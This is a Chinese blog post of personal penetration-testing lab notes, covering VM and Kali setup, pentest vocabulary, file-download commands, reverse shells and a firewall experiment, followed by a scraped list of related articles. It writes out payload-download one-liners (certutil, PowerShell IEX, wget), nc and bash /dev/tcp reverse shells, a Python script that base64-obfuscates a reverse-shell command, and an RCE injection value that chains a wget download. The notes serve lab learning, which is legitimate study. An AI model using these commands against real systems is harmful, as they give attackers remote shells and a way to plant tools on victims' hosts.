下载文章

方法一:下载谷歌插件fireshot,捕捉整个页面

方法二:使用js代码

  • f12进入控制台,粘贴如下代码
(function(){
$("#side").remove();
$("#comment_title, #comment_list, #comment_bar, #comment_form, .announce, #ad_cen, #ad_bot").remove();
$(".nav_top_2011, #header, #navigator").remove();
$(".p4course_target, .comment-box, .recommend-box, #csdn-toolbar, #tool-box").remove();
$("aside").remove();
$(".tool-box").remove();
$("#toolBarBox").remove();
$("main").css('display','content');
$("main").css('float','left');
$(".option-box").remove();
$("body").css('min-width',0);
$(".option-box").remove();
window.print();
})();
  • 如下图所示

  • 另存为pdf即可

参考链接:https://blog.csdn.net/weixin_44928129/article/details/122569120

虚拟机配置

  • 安装好vmware之后,在首选项进行如下修改

  • 创建新的虚拟机的时候,一直点下一步,创建磁盘容量的时候,选择单个文件

  • win10的镜像可以去官网下载:https://www.microsoft.com/zh-cn/software-download/windows10/,这里是详细教程https://blog.csdn.net/Jackliu200911/article/details/116548055

  注意这两步:

  

  • ubuntu20.04安装教程:https://blog.csdn.net/weixin_41805734/article/details/120698714
  • win2k8
    • 开启3389端口,远程桌面:reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nul
    • 关闭防火墙
    • 在物理机win+r,输入mstsc,进行连接
  • kali官网https://www.kali.org/
  • kali的汉化
    • ctrl+alt+t,打开终端,在终端中执行dpkg-reconfigure locales
    • en_US.UTF-8 UTF-8改为不勾选,按下空格

    • 勾选zh-CN.UTF-8 UTF-8,按下回车选择第三个。若有zh_CN.GBK GBK也一起勾选上,没有就不用。

    • 重启之后,会有个提示,选择保留旧名称
  • kali开启ssh服务
    • sudo vi /etc/ssh/sshd_config
    • # PasswordAuthentication yes的“#”去掉
    • 修改PermitrootLogin prohibit-passwordPermitRootLogin yes

    • sudo service ssh restart,重启ssh服务。sudo service ssh status,查看ssh服务

渗透测试常用命令

查找文件find / -name flag ,*代表模糊查找(bash)
ps-ef | grep apt

  常用的命令:https://blog.csdn.net/weixin_43303273/article/details/83029138

  Linux:https://blog.csdn.net/liangpingguo/article/details/79140780

  cmd:https://www.cnblogs.com/air-of-code/p/6015590.html

  powershell:
        https://www.anquanke.com/post/id/87976
        https://www.anquanke.com/post/id/88851
        https://www.anquanke.com/post/id/89362

渗透测试常用名词

POC:概念验证,常指漏洞证明的代码,无害
EXP:利用,指利用系统漏洞进行攻击,每个漏洞都有其 独有 的exp,有害
Payload:有效载荷,成功exploit之后,真正再在标系统执行的代码或者指令,可用于 多个 漏洞

 参考链接:

  渗透测试专业术语:https://www.cnblogs.com/sunny11/p/13583083.html
  ATT&CK:https://attack.mitre.org/

文件下载

对于文件下载和反弹shell的命令,棱角社区能够自动生成:

棱角社区:https://forum.ywhack.com/bountytips.php?download

  • python启用临时web服务
python3 -m http.server -d / 8888
python2 -m simpleHTTPServer -d / 8888
//-d指定启用web服务的路径,python在/下启动临时的http服务,使用wget下载会下载/下的,默认路径是/root
  • Linux文件下载
wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe
curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe
  • powershell文件下载
powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/ms10-051.exe', exploit.exe)"
  • cmd文件下载
certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe
copy \\127.0.0.1\files\ms10-051.exe exploit.exe

  其他不一一列举,可以在棱角社区进行查询。

防火墙

  防火墙有出站规则和入站规则,相较而言,出站规则比入站规则宽松很多。讲的通俗点,自己想出去限制少,别人想进来限制多。

反弹shell

ncat:

victim:
nc -e /bin/bash ip port //linux
nc -e cmd ip port //windows listener:
nc -lvvnp port

bash:

victim:
bash -i >& /dev/tcp/ip/port 0>&1
sh -i >& /dev/tcp/ip/port 0>&1 listener:
nc -lvvnp port

python:

#!/usr/bin/env python
# coding=utf-8
import argparse,base64 def main():
parser = argparse.ArgumentParser(description="")
parser.add_argument('-i','--ip',help='回连IP',default="127.0.0.1")
parser.add_argument('-p','--port',help='回连端口',default="3456")
args = parser.parse_args()
print(args)
ip = args.ip
port = args.port
cmd = "bash -i >/dev/tcp/"+ip+"/"+port+" 0>&1"
encoder = base64.b64encode(cmd.encode("utf-8"))
try:
print("bash -c {echo,"+encoder.decode("utf-8")+"}|{base64,-d}|{bash,-i}")
except :
print("可以使用-h参数查看帮助信息") if __name__ == '__main__':
main()
  • kali用bash弹shell,会报错zsh: 没有那个文件或目录: /dev/tcp/ip/port

    • 解决办法:sudo vi /etc/passwd,将zsh改成bash

   kali作为攻击机:172.168.10.128

   win2k8作为靶机:172.16.10.130

  • !!!靶机能够成功ping通kali,kali也能成功ping通靶机

  • 在kali上开启临时的http服务,win2k8下载kali的/root/pentest目录下的nc.exe,并且重命名为a.exe。如果不开启http服务,失败结果如下一张图。为了方便实验,将a.exe改回nc.exe

  • 正向连接

    • 情况一:防火墙开启,win2k8出站

    • 情况二:防火墙开启,kali入站,无法成功反弹shell

    • 情况三:防火墙关闭,kali入站,成功反弹shell

  • 反向连接

    • 为什么要反向连接?

      • 目标在局域网内,攻击机无法ping通目标
      • 端口占用
      • 由于防火墙等限制,目标主机只能发送请求,不能接收请求
      • ip动态改变
  • 进行网络上的修改,取消勾选箭头所示

  • win2k8靶机:172.16.10.130,物理机:192.168.0.183。内网可以访问外网,外网访问不了内网

  • 防火墙开启,无法访问内网的情况下,能成功反弹shell

思路

  • 如果有RCE,可以尝试绕过。如127.0.0.1 & wget http://ip:port/example.exe,帮目标机下载安装nc,再用ncat进行反弹
  • 直接用bash进行反弹shell

0x00.常用名词、文件下载、反弹shell的更多相关文章

  1. 小迪安全 Web安全 基础入门 - 第一天 - 操作系统&名词&文件下载&反弹SHELL&防火墙绕过

    一.专业名词 1.POC:(Proof of Concept),即概念验证.漏洞报告中的POC是一段说明或一个攻击的样例使读者能够确认这个漏洞是真实存在的. 2.EXP:exploit,即漏洞利用.对 ...

  2. 常用的一句话反弹shell总结

    文章转载来源:https://blog.csdn.net/qq_38684504/article/details/90047213#1.%20bash%E7%9B%B4%E6%8E%A5%E5%8F% ...

  3. linux 常用反弹shell小记

    在渗透测试过程中由于防火墙和其它安全防御措施,很多服务器只能单向向外访问,不能被访问,我们常常需要反弹shell. 1.bash反弹shell 本地开启监听 nc -lvvp 受害主机命令 bash ...

  4. Linux渗透之反弹Shell

    前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的.在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个 ...

  5. Linux下几种反弹Shell方法的总结与理解

    之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在 ...

  6. linux 反弹shell

    Linux下反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点. nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或 ...

  7. 渗透测试中Linux下反弹shell的认识

    最近老是觉得自己白天工作累,晚上理应休息 堕落了几天才发觉自己真垃圾,加紧向前吧. 0x00 前言 在平时渗透还是工作中经常会遇到shell反弹的情况,网上一搜反弹shell都是一大堆,但是真正遇到反 ...

  8. [Shell]多姿势反弹shell

    客户端监听本地: nc -nvlp 4444 从原生的 shell 环境切换到 linux 的交互式 bash 环境: python -c 'import pty; pty.spawn("/ ...

  9. 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。

    反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹.假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规 ...

  10. Linux 反弹shell(二)反弹shell的本质

    Linux 反弹shell(二)反弹shell的本质 from:https://xz.aliyun.com/t/2549 0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向 ...

随机推荐

  1. BUUCTF-RE-[BJDCTF2020]BJD hamburger competition

    啊这,点进去康康 dnspy反编译的题,https://www.52pojie.cn/thread-495115-1-1.html 里面有详细介绍 然后文件很多,我不知道找哪一个下手 看其他师傅的wp ...

  2. 带你读论文丨Fuzzing漏洞挖掘详细总结 GreyOne

    本文分享自华为云社区<[论文阅读] (03) 清华张超老师 - Fuzzing漏洞挖掘详细总结 GreyOne>,作者: eastmount. 一.传统的漏洞挖掘方法 演讲题目: 数据流敏 ...

  3. Linux学习疑惑总结

    重定向问题 Linux shell 中 2>&1 的含义 首先了解下1和2在Linux中代表什么,先整理一份在Linux系统中0 1 2是一个文件描述符: 名称 代码 操作符 Java中 ...

  4. Java并发编程 优化多任务查询接口

    代码展示 @RestController @RequestMapping("/api") public class TestController { @Resource priva ...

  5. QEMU tap数据接收流程

    QEMU直接从tap/tun取数据 QEMU tap数据接收步骤: qemu从tun取数据包 qemu将数据包放入virtio硬件网卡. qemu触发中断. 虚拟机收到中断,从virtio读取数据. ...

  6. 手机用户的开源福音「GitHub 热点速览」

    不知道多少用安卓机的小伙伴,被开屏广告烦过.相比有些克制的 iOS 机,安卓机是个应用基本上都有开屏广告,少则 3s 多则 10s,本周获得 1k+ star 的 Android-Touch-Help ...

  7. 推荐vue脚手架工具 vue-cli

    安装vue-cli之前,需要先装好vue 和 webpack npm install -g vue //全局安装vue npm install -g webpack //全局安装webpack npm ...

  8. linux安装clickhouse

    linux安装clickhouse 1. 系统要求 ClickHouse可以在任何具有x86_64,AArch64或PowerPC64LE CPU架构的Linux,FreeBSD或Mac OS X上运 ...

  9. Docker V24 及 Docker Compose V2 的安装及使用

    前言 Docker 是一款流行的开源容器化平台,使用 Docker 可以有效地隔离应用程序和系统环境,使得应用程序在不同的环境中具有相同的行为 Docker Compose 是一个用于定义和管理多个 ...

  10. ⭐malloc(易造成内存泄漏)(及时释放内存)

    1,关于malloc以及相关的几个函数 #include <stdlib.h>(Linux下)       void *malloc(size_t size);       void fr ...